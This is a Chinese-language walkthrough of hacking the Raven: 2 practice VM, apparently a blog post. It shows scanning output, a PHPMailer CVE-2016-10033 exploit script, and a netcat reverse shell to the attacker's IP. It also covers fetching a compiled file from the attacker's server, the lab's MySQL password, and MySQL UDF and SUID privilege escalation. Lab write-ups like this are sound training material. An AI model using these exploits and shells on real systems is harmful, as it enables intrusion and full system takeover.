-
B2R Raven: 2靶机渗透
B2R Raven: 2靶机渗透
视频参考:ajest :
https://www.zhihu.com/zvideo/1547357583714775040?utm_id=0原文参考:ajest :
https://zhuanlan.zhihu.com/p/270343652文章目录
1 启动靶机,查看后网卡为mac为00:0C:29:C6:C5:8F
00:0C:29:C6:C5:8F- 1
-sS: 使用 SYN 扫描(也称为半开放扫描),发送 SYN 包以探测目标主机上的开放端口。- 1
┌──(kali💋kali)-[~/Desktop/frp_0.33.0_linux_amd64] └─$ sudo nmap -sS 192.168.225.0/24- 1
- 2
2 显示信息:
Nmap scan report for bogon (192.168.225.213) Host is up (0.00059s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind MAC Address: 00:0C:29:C6:C5:8F (VMware)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
3 快速扫描主机全部信息
nmap -T4 -A -v 192.168.225.213 -T4: 使用 T4 扫描速度,代表比默认扫描更快的速度级别。 -A: 执行 OS识别,版本检测、脚本扫描和traceroute。 -v: 输出详细信息,使扫描输出更加详尽。- 1
- 2
- 3
- 4
- 5
扫描结果:
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 2681c1f35e01ef93493d911eae8b3cfc (DSA) | 2048 315801194da280a6b90d40981c97aa53 (RSA) | 256 1f773119deb0e16dca77077684d3a9a0 (ECDSA) |_ 256 0e8571a8a2c308699c91c03f8418dfae (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-title: Raven Security | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.10 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 35627/udp6 status | 100024 1 51031/tcp status | 100024 1 59614/tcp6 status |_ 100024 1 60260/udp status Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
4 内核信息没有扫描到,使用nmap继续扫描
sudo nmap -Pn -A -p- -sT -sC -T4 10.4.7.151 -oN nmap.A- 1
┌──(kali💋kali)-[~/Desktop/frp_0.33.0_linux_amd64] └─$ sudo nmap -Pn -A -p- -sT -sC -T4 192.168.225.213 -oN nmap.A [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-13 17:29 CST Nmap scan report for bogon (192.168.225.213) Host is up (0.0020s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 2681c1f35e01ef93493d911eae8b3cfc (DSA) | 2048 315801194da280a6b90d40981c97aa53 (RSA) | 256 1f773119deb0e16dca77077684d3a9a0 (ECDSA) |_ 256 0e8571a8a2c308699c91c03f8418dfae (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-title: Raven Security |_http-server-header: Apache/2.4.10 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 35627/udp6 status | 100024 1 51031/tcp status | 100024 1 59614/tcp6 status |_ 100024 1 60260/udp status 51031/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:C6:C5:8F (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
5 dirb扫描具体的目录,没有价值
┌──(root💀kali)-[~] └─# dirb http://192.168.225.213:111- 1
- 2
----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Oct 13 17:33:53 2023 URL_BASE: http://192.168.225.213:111/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.225.213:111/ ---- (!) FATAL: Too many errors connecting to host (Possible cause: RECV ERROR) ----------------- END_TIME: Fri Oct 13 17:33:53 2023- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
6 使用xray扫描,有个敏感目录
http://192.168.225.213/wordpress/wp-admin/install.php- 1
7【dirsearch 】扫描敏感目录
dirsearch -u http://192.168.225.213/ -i 200,300-399 -e php- 1
┌──(root💀kali)-[~] └─# dirsearch -u http://192.168.225.213/ -i 200,300-399 -e php _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 8940 Output File: /root/.dirsearch/reports/192.168.225.213/-_23-10-13_19-18-49.txt Error Log: /root/.dirsearch/logs/errors-23-10-13_19-18-49.log Target: http://192.168.225.213/ [19:18:49] Starting: [19:18:51] 200 - 18KB - /.DS_Store [19:19:23] 200 - 9KB - /contact.php [19:19:23] 301 - 316B - /css -> http://192.168.225.213/css/ [19:19:30] 301 - 318B - /fonts -> http://192.168.225.213/fonts/ [19:19:33] 301 - 316B - /img -> http://192.168.225.213/img/ [19:19:34] 200 - 16KB - /index.html [19:19:36] 301 - 315B - /js -> http://192.168.225.213/js/ [19:19:36] 200 - 4KB - /js/ [19:19:41] 200 - 626B - /manual/index.html [19:19:41] 301 - 319B - /manual -> http://192.168.225.213/manual/ [19:20:08] 200 - 5KB - /vendor/ [19:20:10] 200 - 2KB - /wordpress/wp-login.php [19:20:10] 200 - 51KB - /wordpress/- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
dirsearch -u http://192.168.225.213/wordpress/ -i 200,300-399 -e php- 1
┌──(root💀kali)-[~] └─# dirsearch -u http://192.168.225.213/wordpress/ -i 200,300-399 -e php _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 8940 Output File: /root/.dirsearch/reports/192.168.225.213/-wordpress-_23-10-13_17-45-04.txt Error Log: /root/.dirsearch/logs/errors-23-10-13_17-45-04.log Target: http://192.168.225.213/wordpress/ [17:45:04] Starting: [17:45:55] 301 - 0B - /wordpress/index.php -> http://192.168.225.213/wordpress/ [17:45:59] 200 - 19KB - /wordpress/license.txt [17:46:16] 200 - 7KB - /wordpress/readme.html [17:46:35] 301 - 331B - /wordpress/wp-admin -> http://192.168.225.213/wordpress/wp-admin/ [17:46:35] 301 - 333B - /wordpress/wp-content -> http://192.168.225.213/wordpress/wp-content/ [17:46:35] 200 - 0B - /wordpress/wp-content/ [17:46:35] 200 - 0B - /wordpress/wp-config.php [17:46:36] 200 - 69B - /wordpress/wp-content/plugins/akismet/akismet.php [17:46:36] 200 - 1KB - /wordpress/wp-admin/install.php [17:46:36] 200 - 999B - /wordpress/wp-content/uploads/ [17:46:36] 200 - 809B - /wordpress/wp-content/upgrade/ [17:46:36] 200 - 1B - /wordpress/wp-admin/admin-ajax.php [17:46:36] 302 - 0B - /wordpress/wp-admin/ -> http://raven.local/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.225.213%2Fwordpress%2Fwp-admin%2F&reauth=1 [17:46:36] 301 - 334B - /wordpress/wp-includes -> http://192.168.225.213/wordpress/wp-includes/ [17:46:36] 200 - 0B - /wordpress/wp-cron.php [17:46:36] 302 - 0B - /wordpress/wp-signup.php -> http://raven.local/wordpress/wp-login.php?action=register [17:46:36] 200 - 40KB - /wordpress/wp-includes/ [17:46:36] 200 - 2KB - /wordpress/wp-login.php Task Completed- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
8 扫描到一个敏感目录,版本:PHPMailer 5.2.16
9 wpscan扫描,得到用户信息
wpscan --no-update --url http://192.168.225.213/wordpress -e u,vp,vt --plugins-detection mixed- 1
┌──(root💀kali)-[~] └─# wpscan --no-update --url http://192.168.225.213/wordpress -e u,vp,vt --plugins-detection mixed _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.22 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.225.213/wordpress/ [192.168.225.213] [+] Started: Fri Oct 13 19:38:43 2023 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.225.213/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://192.168.225.213/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.225.213/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.225.213/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.8.23 identified (Unknown, released on Unknown). | Found By: Emoji Settings (Passive Detection) | - http://192.168.225.213/wordpress/, Match: '-release.min.js?ver=4.8.23' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.225.213/wordpress/, Match: 'WordPress 4.8.23' [i] The main theme could not be detected. [+] Enumerating Vulnerable Plugins (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:37 <====================================================================================================================> (6498 / 6498) 100.00% Time: 00:00:37 [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] No plugins Found. [+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:02 <======================================================================================================================> (624 / 624) 100.00% Time: 00:00:02 [+] Checking Theme Versions (via Passive and Aggressive Methods) [i] No themes Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 <========================================================================================================================> (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] steven | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] michael | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Fri Oct 13 19:40:24 2023 [+] Requests Done: 7178 [+] Cached Requests: 5 [+] Data Sent: 2.056 MB [+] Data Received: 1.341 MB [+] Memory used: 310.848 MB [+] Elapsed time: 00:01:40- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
9.1 得到两个用户
steven michael- 1
- 2
10 漏洞情报
公开漏洞情报渠道:
PHPMailer是一个用于发送电子邮件的PHP类库,其广泛应用于PHP程序中。
┌──(root💀kali)-[~] └─# searchsploit phpmailer- 1
- 2
查询后,目标系统PHPMailer 5.2.18 存在RCE 漏洞,编号为CVE-2016-10033。
11 渗透过程
根据漏洞详情根据编号,尝试后放弃,文章乱的一批
漏洞情报:
https://vip.riskivy.com/intellList?,查询到此漏洞,发现看不懂
12 使用
msfconsole进行漏洞利用┌──(kali💋kali)-[/root] └─$ sudo msfconsole [*] Starting persistent handler(s)... msf6 > search phpmailer msf6 > searchploit phpmailer msf6 > searchsploit -m 40974- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
执行后显示具体的脚本路径,修改exploit脚本,
searchsploit m 40974会将py文件拷贝到/root目录下,执行完有提示cd /usr/share/exploitdb/exploits/php/webapps/40974.py- 1
13 使用 python3 ./40974.py
from requests_toolbelt import MultipartEncoder import requests import os import base64 from lxml import html as lh os.system('clear') print("\n") print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ") print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗") print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝") print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗") print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║") print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝") print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com") print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n") #target = 'http://192.168.225.213' #backdoor = '/backdoor.php' target ='http://192.168.225.213' vuln ="/contact.php" backdoor = '/shell.php' #payload = '' payload = '' fields={'action': 'submit', 'name': payload, # 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com', 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/html/shell.php server\" @protonmail.com', 'message': 'Pwned'} m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0', 'Content-Type': m.content_type} proxies = {'http': 'localhost:8081', 'https':'localhost:8081'} print('[+] SeNdiNG eVIl SHeLL To TaRGeT....') r = requests.post(target+vuln, data=m.to_string(), headers=headers) print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D') r = requests.get(target+backdoor, headers=headers) if r.status_code == 200: print('[+] ExPLoITeD ' + target)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
执行成功后,返回shell脚本路径
14 漏洞利用使用蚁剑连接
15 获取反弹
nc -lvvp 8888 # kali的是192.168.225.166 nc -e /bin/sh 192.168.225.166 8888 # 使用蚁剑shell中输入 python -c "import pty;pty.spawn('/bin/bash')" #kali中输入,优化反弹shell- 1
- 2
- 3
16 MySQL UDF 提权使用
"ps aux | grep mysqld" 是一个常用的 Linux 命令行命令组合,用于查找正在运行的与 "mysqld" 关键词相关的 MySQL 服务器进程。 具体解释如下: - "ps" 命令用于查看系统中当前运行的进程。 - "aux" 是 ps 命令的选项,它指定显示所有用户的所有进程。 - "|" 是管道操作符,将前一个命令的输出传递给下一个命令作为输入。 - "grep" 命令用于在文本中搜索指定的关键词,并将包含该关键词的行进行筛选。 - "mysqld" 是 MySQL 服务器的守护进程名称。- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
蚁剑连接时没有发现/wordpress/wp-config.php ,使用
dirsearch扫描到目录
使用浏览器访问是空白
使用find查找此文件find -name "wp-config.php"
cat 查看配置文件,得到数据库用户名密码,账密:root:R@v3nSecurity
17 反弹shell中连接mysql
注意:蚁剑的shell中输入连接mysql是没有响应的
mysql -uroot -pR@v3nSecurity- 1
获取到mysql的版本号5.5.30, 退出mysql输入
exit;
18 搜索mysql版本的EXP
searchsploit mysql udf- 1
searchsploit -m 1518 gcc -g -c 1518.c # 执行这句就可 gcc -g -shared -o 1518.so 1518.o -lc # 这条是软连接 将1518.so 文件上传到靶机的/tmp 目录下。 gcc -g -c 1518.c 解义 - "gcc" 是 GNU 编译器套件(GCC)中的 C 编译器,用于编译和链接 C 语言程序。 - "-g" 是 gcc 的编译选项之一,表示在编译过程中生成调试信息,以便在调试程序时进行源代码级的调试。 - "-c" 是 gcc 的编译选项之一,表示只执行编译步骤,而不进行链接。这将只生成目标文件,而不是可执行文件。 - "1518.c" 是要编译的 C 语言源代码文件的名称。 gcc -g -shared -o 1518.so 1518.o -lc 这条指令是用于将一个名为 "1518.o" 的目标文件与标准 C 库(libc)进行链接,并生成一个名为 "1518.so" 的共享库文件。具体解释如下: - "gcc" 是 GNU 编译器套件(GCC)中的 C 编译器,用于编译和链接 C 语言程序。 - "-g" 是 gcc 的编译选项之一,表示在编译过程中生成调试信息,以便在调试程序时进行源代码级的调试。 - "-shared" 是 gcc 的选项之一,用于指定生成一个共享库文件。 - "-o 1518.so" 是 gcc 的选项之一,用于指定生成的共享库文件的名称为 "1518.so"。 - "1518.o" 是要进行链接的目标文件的名称。 - "-lc" 是 gcc 的选项之一,用于指定需要链接 libc(标准 C 库)。- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
python3 -m http.server 80 wget 192.168.225.166/1518.so # 进行下载,不能有空格,加空格默认下载到- 1
- 2
- 3
- 4
kali开启服务
shell连接下载c编译好的文件
19 重新连接mysql
mysql -uroot -pR@v3nSecurity
19.1 执行下面的指令
create database testyl; use testyl; create table testyl(line blob); insert into testyl values(load_file('/tmp/1518.so')); select * from testyl into dumpfile '/usr/lib/mysql/plugin/udf.so'; create function do_system returns integer soname 'udf.so'; select do_system('chmod u+s /usr/bin/find'); exit; # 执行完退出- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
此时,/usr/bin/find 就具备了SUID 权限。20 SUID 提权
exit;退出mysql用户ls -alh /usr/bin/find # 将会显示 /usr/bin/find 文件的详细信息,包括权限、所有者、大小等。 # -a: 显示所有文件,包括隐藏文件和目录。 # -l: 以长格式显示文件的详细信息,包括文件权限、所有者、大小、创建时间等。 # -h: 以人类可读的方式显示文件大小,例如使用K、M、G等作为单位。 mkdir testyl find testyl -exec '/bin/sh' \; 接着输入指令: id # 执行 find testyl -exec '/bin/sh' \; 将会在 testyl 目录下查找所有文件,并依次将每个文件作为参数传递给 /bin/sh 命令。需要注意的是,在 -exec 选项后面的命令必须以分号(;)结尾。- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
-
相关阅读:
05-树8 File Transfer(并查集)
npm install / webdriver-manager update报错 unable to get local issuer certificate
如何在jar包外设置配置文件
S波与P波的定义(光波电矢量)(菲涅耳公式)
RabbitMQ自学笔记——消息可靠性问题
669. Trim a Binary Search Tree
源端为备库的场景下Duplicate失败问题
基于Python的超市管理系统毕业设计源码111042
【软考软件评测师】第十九章 计算机组成与体系结构(分级存储架构)
【深度学习】logistic回归模型
- 原文地址:https://blog.csdn.net/weixin_42786460/article/details/133827614
